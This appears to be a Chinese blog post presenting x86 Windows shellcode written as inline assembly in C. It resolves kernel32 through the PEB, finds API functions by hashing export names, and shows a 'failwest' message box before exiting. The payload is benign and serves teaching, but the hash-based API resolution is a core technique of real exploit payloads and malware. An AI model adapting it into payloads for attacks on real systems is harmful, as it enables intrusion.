通用shellcode代码

#include <stdio.h>
#include <windows.h>

int main()
{
__asm
{
CLD //清空标志位DF
push 0x1E380A6A //压入MessageBoxA-->user32.dll
push 0x4FD18963 //压入ExitProcess-->kernel32.dll
push 0x0C917432 //压入LoadLibraryA-->kernel32.dll
mov esi,esp //esi=esp,指向堆栈中存放LoadLibraryA的地址
lea edi,[esi-0xc] //edi = 栈顶位置-0xC,例如0x0012FF28 - 0xC==0x0012FF1C
//======开辟一些栈空间
xor ebx,ebx
mov bh,0x04
sub esp,ebx
//======压入"user32.dll"
mov bx,0x3233
push ebx //0x00003233
push 0x72657375 //user
push esp
xor edx,edx //edx=0
//======找kernel32.dll的基地址
mov ebx,fs:[edx+0x30] //[TEB+0x30]-->PEB
mov ecx,[ebx+0xC] //[PEB+0xC]--->PEB_LDR_DATA
mov ecx,[ecx+0x1C] //[PEB_LDR_DATA+0x1C]--->InInitializationOrderModuleList
mov ecx,[ecx] //进入链表第一个就是ntdll.dll
mov ebp,[ecx+0x8] //ebp= kernel32.dll的基地址

find_lib_functions:
lodsd //eax=[ds*10H+esi],读出来是LoadLibraryA的Hash
cmp eax,0x1E380A6A //与MessageBoxA的Hash进行比较不等，必跳
jne find_functions
xchg eax,ebp
call [edi-0x8]
xchg eax,ebp

find_functions:
pushad //保护寄存器
mov eax,[ebp+0x3C] //PE头
mov ecx,[ebp+eax+0x78] //导出表的指针
add ecx,ebp //ecx=0x78C00000+0x262c
mov ebx,[ecx+0x20] //导出函数的名字列表
add ebx,ebp //ebx=0x78C00000+0x353C
xor edi,edi //这里了

next_function_loop:
inc edi
mov esi,[ebx+edi*4] //从列表数组中读取
add esi,ebp //esi = 函数名称所在地址
cdq

hash_loop:
movsx eax,byte ptr[esi]
cmp al,ah
jz compare_hash
ror edx,7
add edx,eax
inc esi
jmp hash_loop

compare_hash:
cmp edx,[esp+0x1C]
jnz next_function_loop

mov ebx,[ecx+0x24] //
add ebx,ebp //= 0x78C00000+0x4424
mov di,[ebx+2*edi]
mov ebx,[ecx+0x1C]
add ebx,ebp
add ebp,[ebx+4*edi]
xchg eax,ebp
pop edi
stosd

push edi
popad

cmp eax,0x1e380a6a
jne find_lib_functions

function_call:
xor ebx,ebx
push ebx //cut string
push 0x74736577
push 0x6c696166 //push failwest
mov eax,esp
push ebx
push eax
push eax
push ebx
call [edi-0x04] //call MessageBoxA
push ebx
call [edi-0x08] //call ExitProcess
nop
nop
nop
nop
}
return 0;
}

巴特西

通用shellcode代码

最新文章

热门文章